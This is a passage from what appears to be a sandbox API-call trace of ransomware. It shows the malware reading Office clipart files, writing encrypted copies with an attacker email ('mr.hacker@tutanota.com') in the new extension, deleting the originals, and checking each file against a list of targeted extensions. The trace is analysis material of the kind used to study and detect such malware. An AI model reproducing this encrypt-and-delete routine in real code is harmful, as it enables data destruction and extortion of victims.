lpString2=".WMF") returned -1 [0271.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF") returned 63 [0271.262] lstrlenW (lpString=".1cd") returned 4 [0271.262] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00096_.WMF") returned 63 [0271.262] lstrlenW (lpString=".jpg") returned 4 [0271.262] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.262] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.262] lstrlenW (lpString="FD00397_.WMF") returned 12 [0271.262] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00397_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0271.275] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=10816) returned 1 [0271.275] CloseHandle (hObject=0x3a8) returned 1 [0271.275] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00397_.wmf")) returned 0x20 [0271.303] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00397_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.354] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00397_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0271.354] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.354] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.354] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00397_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0271.354] GetLastError () returned 0x0 [0271.354] ReadFile (in: hFile=0x3a8, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x2a40, lpOverlapped=0x0) returned 1 [0271.365] WriteFile (in: hFile=0x398, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0x2a50, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0x2a50, lpOverlapped=0x0) returned 1 [0271.366] ReadFile (in: hFile=0x3a8, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0271.366] WriteFile (in: hFile=0x398, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.366] SetEndOfFile (hFile=0x398) returned 1 [0271.368] CloseHandle (hObject=0x398) returned 1 [0271.368] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.368] SetEndOfFile (hFile=0x3a8) returned 1 [0271.370] CloseHandle (hObject=0x3a8) returned 1 [0271.370] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.370] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00397_.wmf")) returned 1 [0271.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF") returned 63 [0271.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF") returned 63 [0271.370] lstrlenW (lpString=".doc") returned 4 [0271.370] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.370] lstrlenW (lpString=".docx") returned 5 [0271.370] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.370] lstrlenW (lpString=".pdf") returned 4 [0271.370] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.370] lstrlenW (lpString=".xls") returned 4 [0271.370] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.370] lstrlenW (lpString=".xlsx") returned 5 [0271.370] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.370] lstrlenW (lpString=".ppt") returned 4 [0271.370] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF") returned 63 [0271.370] lstrlenW (lpString=".zip") returned 4 [0271.371] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.371] lstrlenW (lpString=".rar") returned 4 [0271.371] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.371] lstrlenW (lpString=".bz2") returned 4 [0271.371] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.371] lstrlenW (lpString=".7z") returned 3 [0271.371] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF") returned 63 [0271.371] lstrlenW (lpString=".dbf") returned 4 [0271.371] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF") returned 63 [0271.371] lstrlenW (lpString=".1cd") returned 4 [0271.371] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF") returned 63 [0271.371] lstrlenW (lpString=".jpg") returned 4 [0271.371] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF") returned 63 [0271.371] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF") returned 63 [0271.371] lstrlenW (lpString=".doc") returned 4 [0271.371] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.371] lstrlenW (lpString=".docx") returned 5 [0271.371] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.371] lstrlenW (lpString=".pdf") returned 4 [0271.371] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.371] lstrlenW (lpString=".xls") returned 4 [0271.371] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.371] lstrlenW (lpString=".xlsx") returned 5 [0271.371] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.371] lstrlenW (lpString=".ppt") returned 4 [0271.372] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF") returned 63 [0271.372] lstrlenW (lpString=".zip") returned 4 [0271.372] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.372] lstrlenW (lpString=".rar") returned 4 [0271.372] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.372] lstrlenW (lpString=".bz2") returned 4 [0271.372] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.372] lstrlenW (lpString=".7z") returned 3 [0271.372] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF") returned 63 [0271.372] lstrlenW (lpString=".dbf") returned 4 [0271.372] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF") returned 63 [0271.372] lstrlenW (lpString=".1cd") returned 4 [0271.372] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.372] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00397_.WMF") returned 63 [0271.372] lstrlenW (lpString=".jpg") returned 4 [0271.372] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.373] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.373] lstrlenW (lpString="FD00455_.WMF") returned 12 [0271.373] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00455_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0271.373] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=8926) returned 1 [0271.373] CloseHandle (hObject=0x3a8) returned 1 [0271.373] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00455_.wmf")) returned 0x20 [0271.373] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00455_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.373] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00455_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0271.373] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.373] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.373] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00455_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0271.374] GetLastError () returned 0x0 [0271.374] ReadFile (in: hFile=0x3a8, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x22de, lpOverlapped=0x0) returned 1 [0271.375] WriteFile (in: hFile=0x398, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0x22e0, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0x22e0, lpOverlapped=0x0) returned 1 [0271.376] ReadFile (in: hFile=0x3a8, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0271.376] WriteFile (in: hFile=0x398, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.376] SetEndOfFile (hFile=0x398) returned 1 [0271.376] CloseHandle (hObject=0x398) returned 1 [0271.376] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.376] SetEndOfFile (hFile=0x3a8) returned 1 [0271.407] CloseHandle (hObject=0x3a8) returned 1 [0271.408] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.408] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00455_.wmf")) returned 1 [0271.408] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF") returned 63 [0271.408] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF") returned 63 [0271.408] lstrlenW (lpString=".doc") returned 4 [0271.408] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.408] lstrlenW (lpString=".docx") returned 5 [0271.408] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.408] lstrlenW (lpString=".pdf") returned 4 [0271.408] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.408] lstrlenW (lpString=".xls") returned 4 [0271.408] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.408] lstrlenW (lpString=".xlsx") returned 5 [0271.408] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.408] lstrlenW (lpString=".ppt") returned 4 [0271.408] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.408] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF") returned 63 [0271.408] lstrlenW (lpString=".zip") returned 4 [0271.408] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.408] lstrlenW (lpString=".rar") returned 4 [0271.408] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.409] lstrlenW (lpString=".bz2") returned 4 [0271.409] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.409] lstrlenW (lpString=".7z") returned 3 [0271.409] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.409] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF") returned 63 [0271.409] lstrlenW (lpString=".dbf") returned 4 [0271.409] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.409] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF") returned 63 [0271.409] lstrlenW (lpString=".1cd") returned 4 [0271.409] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.409] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF") returned 63 [0271.409] lstrlenW (lpString=".jpg") returned 4 [0271.409] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.409] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF") returned 63 [0271.409] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF") returned 63 [0271.409] lstrlenW (lpString=".doc") returned 4 [0271.409] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.409] lstrlenW (lpString=".docx") returned 5 [0271.409] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.409] lstrlenW (lpString=".pdf") returned 4 [0271.409] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.409] lstrlenW (lpString=".xls") returned 4 [0271.409] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.409] lstrlenW (lpString=".xlsx") returned 5 [0271.409] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.409] lstrlenW (lpString=".ppt") returned 4 [0271.409] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.409] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF") returned 63 [0271.409] lstrlenW (lpString=".zip") returned 4 [0271.409] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.410] lstrlenW (lpString=".rar") returned 4 [0271.410] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.410] lstrlenW (lpString=".bz2") returned 4 [0271.410] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.410] lstrlenW (lpString=".7z") returned 3 [0271.410] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.410] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF") returned 63 [0271.410] lstrlenW (lpString=".dbf") returned 4 [0271.410] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.410] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF") returned 63 [0271.410] lstrlenW (lpString=".1cd") returned 4 [0271.410] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.410] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF") returned 63 [0271.410] lstrlenW (lpString=".jpg") returned 4 [0271.410] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.410] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.410] lstrlenW (lpString="FD00564_.WMF") returned 12 [0271.410] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00564_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0271.425] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=896) returned 1 [0271.425] CloseHandle (hObject=0x388) returned 1 [0271.426] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00564_.wmf")) returned 0x20 [0271.459] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00564_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.459] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00564_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0271.459] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.459] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.459] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00564_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0271.459] GetLastError () returned 0x0 [0271.459] ReadFile (in: hFile=0x380, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x380, lpOverlapped=0x0) returned 1 [0271.471] WriteFile (in: hFile=0x390, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0x390, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0x390, lpOverlapped=0x0) returned 1 [0271.472] ReadFile (in: hFile=0x380, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0271.472] WriteFile (in: hFile=0x390, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.473] SetEndOfFile (hFile=0x390) returned 1 [0271.473] CloseHandle (hObject=0x390) returned 1 [0271.473] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.473] SetEndOfFile (hFile=0x380) returned 1 [0271.474] CloseHandle (hObject=0x380) returned 1 [0271.475] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.475] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00564_.wmf")) returned 1 [0271.475] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF") returned 63 [0271.475] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF") returned 63 [0271.475] lstrlenW (lpString=".doc") returned 4 [0271.475] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.475] lstrlenW (lpString=".docx") returned 5 [0271.475] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.475] lstrlenW (lpString=".pdf") returned 4 [0271.475] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.475] lstrlenW (lpString=".xls") returned 4 [0271.475] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.475] lstrlenW (lpString=".xlsx") returned 5 [0271.475] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.475] lstrlenW (lpString=".ppt") returned 4 [0271.475] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.475] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF") returned 63 [0271.475] lstrlenW (lpString=".zip") returned 4 [0271.475] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.475] lstrlenW (lpString=".rar") returned 4 [0271.476] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.476] lstrlenW (lpString=".bz2") returned 4 [0271.476] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.476] lstrlenW (lpString=".7z") returned 3 [0271.476] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF") returned 63 [0271.476] lstrlenW (lpString=".dbf") returned 4 [0271.476] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF") returned 63 [0271.476] lstrlenW (lpString=".1cd") returned 4 [0271.476] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF") returned 63 [0271.476] lstrlenW (lpString=".jpg") returned 4 [0271.476] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF") returned 63 [0271.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF") returned 63 [0271.476] lstrlenW (lpString=".doc") returned 4 [0271.476] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.476] lstrlenW (lpString=".docx") returned 5 [0271.476] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.476] lstrlenW (lpString=".pdf") returned 4 [0271.476] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.476] lstrlenW (lpString=".xls") returned 4 [0271.476] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.476] lstrlenW (lpString=".xlsx") returned 5 [0271.476] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.476] lstrlenW (lpString=".ppt") returned 4 [0271.476] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF") returned 63 [0271.477] lstrlenW (lpString=".zip") returned 4 [0271.477] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.477] lstrlenW (lpString=".rar") returned 4 [0271.477] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.477] lstrlenW (lpString=".bz2") returned 4 [0271.477] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.477] lstrlenW (lpString=".7z") returned 3 [0271.477] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF") returned 63 [0271.477] lstrlenW (lpString=".dbf") returned 4 [0271.477] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF") returned 63 [0271.477] lstrlenW (lpString=".1cd") returned 4 [0271.477] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00564_.WMF") returned 63 [0271.477] lstrlenW (lpString=".jpg") returned 4 [0271.477] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.477] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0271.477] lstrlenW 